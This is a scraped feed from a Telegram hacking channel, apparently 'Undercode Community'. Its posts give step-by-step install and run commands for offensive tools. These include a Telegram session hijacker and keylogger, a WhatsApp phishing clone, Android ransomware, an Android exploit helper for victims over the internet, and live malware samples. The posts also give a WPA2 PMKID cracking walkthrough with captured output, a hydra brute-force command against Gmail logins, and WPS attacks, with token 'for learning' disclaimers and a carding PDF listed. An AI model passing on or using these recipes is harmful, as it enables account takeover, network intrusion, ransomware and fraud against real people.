UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.1K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
β€”β€”β€”β€”β€”UNDERCODEβ€”β€”β€”β€”β€”β€”-

BEST WAY TO DOWNLOAD ANY YOUTUBE VIDEO ANDROID 2019
Via TERMUX
(T.me/UnderCodeTestingOfficial)

πŸ¦‘INSTALLISATION:

1) pkg update

2) pkg install curl

3)pkg install git

4) Curl https://raw.githubusercontent.com/SarfarazRLZ/Termux-For-Youtube/master/youtube_settings.sh -o youtube.sh

5) chmod +x youtube.sh

6) dos2unix youtube.sh

@ Steave(t.m.)
β€”β€”β€”β€”β€”-UNDERCODEβ€”β€”β€”β€”β€”β€”
./youtube.sh
β€”β€”β€”β€”β€”UNDERCODEβ€”β€”β€”β€”

BEST SCRIPT TO HACK TELEGRAM WINDOWS // use for learning
( Instagram.com/UnderCodeTestingCompany)
> A Tools Session Hijacking And Stealer Local passcode Telegram Windows

πŸ¦‘Features :

1) Session Hijacking

2) Stealer Local Passcode

3) Keylogger

4) Shell

5) Bypass 2 Step Verification☠️

6) Bypass Av (Coming Soon)
Installation Windows alt tag

πŸ¦‘INSTALLISATION:

1) git clone https://github.com/ultrasecurity/TeleKiller.git

2) cd TeleKiller

3) pip install -r requirements.txt

4) python TeleKiller.py

πŸ¦‘Dependency :

1) python 2.7

2) pyHook

3) pywin32


πŸ¦‘TESTED ON:

> Operating Systems Tested

Windows 10
Windows 8.1
Windows 8
Windows 7

πŸ¦‘Video Tutorial

[+] Youtube : https://youtu.be/Ugz1GSlTZyc

@ Steave(t.m)
β€”β€”β€”β€”β€”β€”UNDERCODEβ€”β€”β€”β€”β€”-
β€”β€”β€”β€”β€”-UNDERCODEβ€”β€”β€”β€”β€”β€”

πŸ¦‘Hack whatsapp web via a cloned website
TESTED ☠️
(Facebook.com/UnderCodeTestingCompanie)

πŸ¦‘requirements:

1) Python >= 3.6.3

2) Flask==1.0.2

3) Selenium==3.7.0

4) Gecko Driver

5) disclamer

πŸ¦‘THIS IS FOR DEMONSTRATIVE PURPOSES ONLY.
DO NOT USE ON REAL VICTIMS FOR ANY REASON. CRIMINAL LAW WILL APPLY.

πŸ¦‘INSTALLISATION & RUN:

clone the repo:

1) git clone https://github.com/raptored01/whatsapp_hack.git

2) install the requirements
SO GO TO

> cd path/to/the/repo

3) pip install -r requirements.txt

πŸ¦‘HOW TO RUN?

1) first run the grabber

> python3 grabber.py

2) then run the server

> python3 server.py

@ Steave(t.m.)
β€”β€”β€”β€”β€”UNDERCODEβ€”β€”β€”β€”-
β€”β€”β€”β€”β€”β€”UNDERCODEβ€”β€”β€”β€”

MOST DANGEROUS SCRIPT IN WORLD TERMUX ☠️ HACKULA INSIDE INTRANET
BREAKED FROM GOV SHARED TO GIT

πŸ¦‘LET S. TALK ABOUT SOME FEATURES:

1) Trape is an OSINT analysis and research tool, which allows people to track and execute intelligent social engineering attacks in real time.

2) It was created with the aim of teaching the world how large Internet companies could obtain confidential information such as the status of sessions of their websites or services

3) control their users through their browser, without their knowlege, but It evolves with the aim of helping government organizations, companies and researchers to track the cybercriminals.
(T.me/UnderCodeTestingOfficial)
Plz use for learning

πŸ¦‘INSTALLISATION:
(termux)

1). git clone https://github.com/jofpin/trape.git

2) cd trape

3) python2 trape.py -h

4) If you face error in launching, try to install all the libraries that are located in the file requirements.txt

> python2 -m pip install -r requirements.txt


πŸ¦‘ Example of execution

Example: python2 trape.py --url http://example.com --port 8080


πŸ¦‘HOW TO RUN :

ALL COMMANDS INSIDE THIS SCRIPT:

--url In this option you add the URL you want to clone, which works as a decoy.

--port Here you insert the port, where you are going to run the trape server.

--accesskey You enter a custom key for the trape panel, if you do not insert it will generate an automatic key.

--injectcode trape contains a REST API to play anywhere, using this option you can customize the name of the file to include, if it does not, generates a random name allusive to a token.

--local Using this option you can call a local HTML file, this is the replacement of the --url option made to run a local lure in trape.

--ngrok In this option you can enter a token, to run at the time of a process. This would replace the token saved in configurations.

--version You can see the version number of trape.

--update Option used to upgrade to the latest version of trape.

--help It is used to see all the above options, from the executable.


Writtem by Steave(t.m)
β€”β€”β€”β€”β€”β€”UNDERCODEβ€”β€”β€”β€”β€”-
PHP TUTORIAL FULL UNDERCODE .pdf
1.1 MB
β€”β€”β€”β€”β€”UNDERCODEβ€”β€”β€”β€”β€”β€”

HOW EXPLOITE ANDROID VIA AUTOMATE SCRIPT
> YOU CAN GET ANYTHING LIKE CHATS PICTURE AND MORE ...
By forwarding your ip ower lan
(T.me/UnderCodeTestingOFFICIAL)

πŸ¦‘Android Auto Exploit (Via Internet)

Auto android exploit helper. Auto forward your ip to internet. Hack your victim over WAN & Hotspot


πŸ¦‘REQUIREMENTS:

-php
-apache2
-python
-ssh
-metasploit

πŸ¦‘TESTED ON

-Kali Linux

-Parrot OS

-Rooted android


πŸ¦‘INSTALLISATION & RUN :

1. Clone this repository

2. cd android-exploit

3. chmod +x exploit.py

4. python exploit.py

5.forward your ip



@ Steave(t.m)
β€”β€”β€”β€”β€”UNDERCODEβ€”β€”β€”β€”β€”β€”
β€”β€”β€”β€”β€”UNDERCODEβ€”β€”β€”β€”β€”-

πŸ¦‘ANDROID RAMSOMWARE NEW (8 months launched on github)WORK TO ALL VERSIONS (((USE FOR LEARNING)))
(Follow us Instagram.com/UnderCodeTestingCompany)

πŸ¦‘INSTALLIATION:


> AndroidRansomware

> This project was made during an cryptography introduction week during ours cursus at ESGI school.

> This project is split in two component:


πŸ¦‘UNDERSTANDING L ATTACK:

1). An Python Api which register, provide and store private/public keys of each devices


2) An Android App which encrypt/decrypt data from phone
Getting Started

3) These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.

4) See deployment for notes on how to deploy the project on a live system.

πŸ¦‘REQUIREMENTS

1) For use the project you must install python 3.X in your host or computer and lanch the command.

πŸ¦‘Installing:

First you have to install the lib needed by the application


Git clone https://github.com/CrabeMan/Android-RansomWare

1) pip install -r requirements.txt

πŸ¦‘LaunchING the Ransome app:

> We can lanch the application in two mode :

1) python runserver.py

2) For launch with production environnment:

> MODE=development python runserver.py

πŸ¦‘The keywords use in mode :

The project structre :

β”œβ”€β”€ LICENSE.md
β”œβ”€β”€ ransomware # The flask application
β”‚ β”œβ”€β”€ init.py
β”‚ β”œβ”€β”€ config # th folder contains the different config for each env
β”‚ β”‚ β”œβ”€β”€ init.py
β”‚ β”‚ └── config.py
β”‚ β”œβ”€β”€ models.py # The schema of the database
β”‚ └── utils.py # Some function use in the application
β”œβ”€β”€ readme.md
β”œβ”€β”€ requirements.txt
└── runserver.py # Script for run the flask application


Written by Steave(t.m)
β€”β€”β€”β€”β€”UNDERCODEβ€”β€”β€”β€”β€”β€”
β€”β€”β€”β€”β€”UNDERCODEβ€”β€”β€”β€”β€”

πŸ¦‘FAST Cracking WPA2 Passwords Using the New PMKID Hashcat Attack
DETAILED & By UnderCode
(T.me/UnderCodeTestingOFFICIAL)

πŸ¦‘INSTALLISATION & RUN:

1) Install Hxctools & Hashcat:

First, we'll install the tools we need. To download , type the following into a terminal window.

1)git clone https://github.com/ZerBea/hcxdumptool.git

2) cd hcxdumptool

3) make

4) make install

5) cd

6) git clone https://github.com/ZerBea/hcxtools.git

7) cd hcxtoolsο»Ώ

8) make

9) make install

10) apt install hashcat

11) airmon-ng start wlan0
(Or wlan1 IF YOU USE A EXTERNAL ADAPTER SUPPORTS PACKET INJECTION)

12) Use Hxcdump to Capture PMKIDs from Local Networks

> hcxdumptool -i wlan1mon -o galleria.pcapng --enable__status=1


13) NOW YOU SEE LIKE THIS IN TERMUNAL

In our command above, we're using wlan1mon to save captured PMKIDs to a file called "galleria.pcapng." While you can specify another status value, I haven't had success capturing with any value except 1.

warning: NetworkManager is running with pid 555
warning: wpa_supplicant is running with pid 611
warning: wlan1mon is probably a monitor interface

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan1mon
FILTERLIST...............: 0 entries
MAC CLIENT...............: fcc233ca8bc5
MAC ACCESS POINT.........: 10ae604b9e82 (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 62439
ANONCE...................: d8dd2206c82ad030e843a39e8f99281e215492dbef56f693cd882d4dfcde9956

[22:17:32 - 001] c8b5adb615ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:32 - 001] c8b5adb615e9 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 -> b4b686abc81a [FOUND PMKID]
[22:17:48 - 011] 14edbb9938ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:48 - 011] 88964e3a8ea0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:49 - 011] dc7fa425888a -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:51 - 011] 88964e801fa0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [EA


14) NOW Use Hxcpcaptool to Convert the Dump for Hashcat
To convert our PCAPNG file, we'll use hcxpcaptool with a few arguments specified. In the same folder that your .

> PCAPNG file is saved, run the following command in a terminal window.

TYPE

> hcxpcaptool -E essidlist -I identitylist -U usernamelist -z galleriaHC.16800 galleria.pcapng

15) Select a Password List & Brute Force with Hashcat

> hashcat -m 16800 galleriaHC.16800 -a 0 --kernel-accel=1 -w 4 --force 'topwifipass.txt'

16) NOW WAIT FOR RESULT
AND YOU SEE KEY RECOVERED

Written by Steave(t.m)
β€”β€”β€”β€”β€”-UNDERCODEβ€”β€”β€”β€”β€”-
β€”β€”β€”β€”β€”-UNDERCODEβ€”β€”β€”β€”β€”-

HACK Gmail / Wordpress / Online logins ... For Termux (No Root)
(Instagram.com/UnderCodeTestingCompany)

πŸ¦‘INSTALLISATION:

1) pkg update

2) pkg upgrade

3) Installing hydra
using this command

> pkg install hydra -y

4) Then create your own wordlist Or download from Net (example wireshark official website )

5) make sure create wordlist in cd $HOME directory

6) Now after creating wordlist, apply this command

> hydra -l yourmail@gmail.com -P yourwordlist.txt -s 465 -S -v -V -t 1 smtp.gmail.com smtp

(Type help to show more commands if want more customize)

Written by Steave(t.m)
β€”β€”β€”β€”β€”UNDERCODEβ€”β€”β€”β€”β€”β€”
β€”β€”β€”β€”-UNDERCODEβ€”β€”β€”β€”-

πŸ¦‘NEW TOPIC IN GITHUB

> theZoo's purpose is to allow the study of malware and enable people who are interested in malware analysis (or maybe even as a part of their job) to have access to live malware, analyse the ways they operate, and maybe even enable advanced and savvy people to block specific malware within their own environment
(Facebook.com/UnderCodeTestingCompanie)

πŸ¦‘INSTALLISATION:
(Termux / Kali)

1) .Clone the repository with git clone https://www.github.com/ytisf/theZoo.

2)cd theZoo

3) pip install --user -r requirements.txt

4) Start by running the console:

> python theZoo.py

πŸ¦‘HOW TO USE:

/conf - The conf folder holds files relevant to the particular running of the program but are not part of the application. You can find the EULA file in the conf and more.

/imports - Contains .py import files used by the rest of the application

/malwares/Binaries - The actual malwares samples - be careful! These are very live.

/malware/Source - Malware source code.

πŸ¦‘Malware under the folder Original is supposed to be (NO PROMISES!) the original source of the malware that leaked. Malware under the folder Reversed is either reversed, decompiled or partially reconstructed


@ Steave(t.m.)
β€”β€”β€”β€”β€”β€”-UNDERCODEβ€”β€”β€”β€”β€”
β€”β€”β€”β€”β€”β€”UNDERCODEβ€”β€”β€”β€”

πŸ¦‘TorrGrab:
Download torrents inside Terminal:
(Twitter.com/UnderCodeTc)

*A Torrent Data Scrapper*

0) No Ads At All

1) Searches Data in PirateBay and Torrentz

2) Gets Magnet Link

3) Downloads The .torrent File if you are connected over VPN

4) If you need to Download Your File You Must Be ON a PC

πŸ¦‘RUN

1) apt install git python3

2) git clone https://github.com/TheSpeedX/TorrGrab

3) cd TorrGrab

4) python torrgrab.py

πŸ¦‘CONTRIBUTORS

Yagami
SpeedX

@ Steave (t.m)
β€”β€”β€”β€”β€”-UNDERCODEβ€”β€”β€”β€”β€”-
IT-hacks- UNDERCODE .pdf
10 MB
TERMUX CARDING UnderCOde.pdf
540.1 KB
β€”β€”β€”β€”β€”-UNDERCODEβ€”β€”β€”β€”β€”-

HACK ANDROID / PASSWORDs /WIFI / GMAIL AND MORE IN ONE SCRIPT ONE OF KALI & TERMUX TOPIC
(Instagram.com/UnderCodeTestingCompany)


πŸ¦‘INSTALLISATION:

πŸ¦‘Installation in Linux :

1) git clone https://github.com/thehackingsage/hacktronian.git

2) cd hacktronian

3) chmod +x install.sh

4) ./install.sh

5) Then choose options

> That's it.. you can execute tool by typing hacktronian

πŸ¦‘Installation in Android :

Open Termux

1) pkg install git

2) pkg install python

3) https://github.com/thehackingsage/hacktronian

4) cd hacktronian

5) chmod +x hacktronian.py

6) python2 hacktronian.py

πŸ¦‘Video Tutorial :

YouTube : https://www.youtube.com/watch?v=1LJlyQAQby4

Written by Steave(t.m)
β€”β€”β€”β€”β€”UNDERCODEβ€”β€”β€”β€”β€”β€”-
------UNDERCODE------

AUTOMATE GOOGLE dork script to collect potentially vulnerable web pages and applications on the Internet.
2019 SCRIPT ☠
(Facebook.com/UnderCodeTestingCompanie)

πŸ¦‘INSTALLISATION:

1) git clone https://github.com/opsdisk/pagodo.git

2) cd pagodo

3) virtualenv -p python3 .venv

4) source .venv/bin/activate environment.

5)pip3 install -r requirements.txt

πŸ¦‘RUNNING THE SCRIPT


1) If you start getting HTTP 503 errors, Google has rightfully detected you as a bot and will block your IP .


> SO USE proxychains and a bank of proxies to round robin the lookups.

> SO AGAIN To Fix

2) open terminal

3) Install proxychains4

> apt install proxychains4 -y

Written by Steave(t.m)
------UNDERCODE----
-------UNDERCODE-----

THE DATA HACKING SCRIPT

πŸ¦‘LITTLE DESCRIPTION:

1) Hacking in the sense of deconstructing an idea, hardware, anything and getting it to do something it wasn’t intended or to better understand how something works." (BSides CFP)

2) So hacking here means we want to quickly deconstruct data, understand what we've got and how to best utilize it for the problem at hand.
(Twitter.com/UnderCodeTC)

πŸ¦‘INSTALLISATION:

1) https://github.com/SuperCowPowers/data_hacking

2) cd data_hacking

3)apt-get

> graphviz,
> freetype,
> Python

4) sudo python setup.py install


πŸ¦‘ To uninstall:


5) sudo pip uninstall data_hacking


πŸ¦‘REQUIREMENTS:

β–ͺ ipython, pygraphviz, pandas, matplotlib, networkx, pyzmq, jinja2, scipy, patsy, statsmodels, pefile, macholib


πŸ¦‘TESTED BY UNDERCODE

> PARROT
> KALI


WRITTEN BY STEAVE(t.m)
-------UNDERCODE------
T.me/UndercodeTestingOfficial

# Support & Share 😁
-------UNDERCODE------

THE FANOUS PASSWORD & Software Crackers John the Ripper Full guide
(Instagram.com/UnderCodeTestingCompany)

πŸ¦‘INSTALLISATION:


> John The Ripper -

1) Clone https://github.com/magnumripper/JohnTheRipper

πŸ¦‘john-the-ripper.sh
## How to install on Ubuntu (also works on Ubuntu for Windows)

> https://github.com/magnumripper/JohnTheRipper

> https://github.com/magnumripper/JohnTheRipper/blob/bleeding-jumbo/doc/

πŸ¦‘EXAMPLES
https://dunnesec.com/category/tools/john-the-ripper/decrypting-linuxunix-password-shadow-files-using/

## From apt packages

### install

1) sudo apt-get update

2) sudo apt-get -y install john john-data

3) sudo john --device=0 --test=0

πŸ¦‘ From Source

1) Install pre-requisites

> mkdir -p ~/src

2) apt update

3) sudo apt-get update


πŸ¦‘ Required stuff

4) sudo apt-get -y install build-essential libssl-dev git

πŸ¦‘ Recommended (extra formats and performance)

5) sudo apt-get -y install yasm libgmp-dev libpcap-dev pkg-config libbz2-dev

πŸ¦‘ If you have an NVIDIA GPU (OpenCL support)

6) sudo apt-get -y install nvidia-opencl-dev

7) sudo apt-get -y install ocl-icd-opencl-dev opencl-headers fglrx-dev

8) sudo apt-get -y install libopenmpi-dev openmpi-bin

πŸ¦‘ Optional REXGEN support (additional cracking modes)

9) sudo apt-get -y install cmake bison flex libicu-dev

10) cd ~/src

11) git clone --recursive https://github.com/teeshop/rexgen.git

12) cd rexgen

13) ./install.sh

14) Clone latest bleeding-edge Jumbo and build

15)Clone GIT repo

> git clone git://github.com/magnumripper/

16)cd ~/src

17) JohnTheRipper -b bleeding-jumbo john

πŸ¦‘For MPI, use './configure --enable-mpi' below

18) ./configure

19) make -s clean && make -sj4

20) ./configure --enable-mpi && make -s clean && make -sj4

πŸ¦‘ Test your build

../run/john --test=0


../run/john --test


Written by Steave(t.m)
-------UNDERCODE-----
WifiHack-NEW for Kali Undercode.pdf
586.9 KB
--------UNDERCODE------

HATE CRACK SCRIPT FOR ANY HASH CRACK
(T.me/UnderCodeTestingOfficial)

πŸ¦‘INSTALLISATION:


1) mkdir -p hashcat/deps

2) git clone https://github.com/KhronosGroup/OpenCL-Headers.git hashcat/deps/OpenCL

3)cd hashcat/

4) make

5) make install

πŸ¦‘Download hate_crack

1) git clone https://github.com/trustedsec/hate_crack.git

2) Customize binary and wordlist paths in "config.json"


3) Make sure that at least "rockyou.txt" is within your "wordlists" path

4) Create Optimized Wordlists

> RUN:

wordlist_optimizer.py - parses all wordlists from <input file list>, sorts them by length and de-duplicates into <output directory>


πŸ¦‘HOW TO USE:

1) python wordlist_optimizer.py <input file list> <output directory>

2) python wordlist_optimizer.py wordlists.txt ../optimized_wordlists

3) ./hate_crack.py : <hash_file> <hash_type>
The <hash_type> is attained by running

4) hashcat --help


Written by Steave(t.m)
--------UNDERCODE-----
-------UNDERCODE-----


SEE NAME OF HIDDEN WIFI ACESS POINT + Wps attack Via simple script
(Instagram.com/UnderCodeTestingCompany)

πŸ¦‘INSTALLISATION:

1) git clone https://github.com/SilentGhostX/HT-WPS-Breaker

Or

1) Copy HT-WPS-Breaker.zip to Desktop .

2)Open The Terminal .

3)!Type the following commands :

> cd Desktop

4) unzip HT-WPS-Breaker.zip

5)cd HT-WPS-Breaker

6)chmod +x HT-WB.sh

7)./HT-WB.sh or bash HT-WB.sh

πŸ¦‘Tested by UnderCode
On

> Rooted android

> kali

> Ubanto


Written by Steave(t.m)
-------UNDERCODE------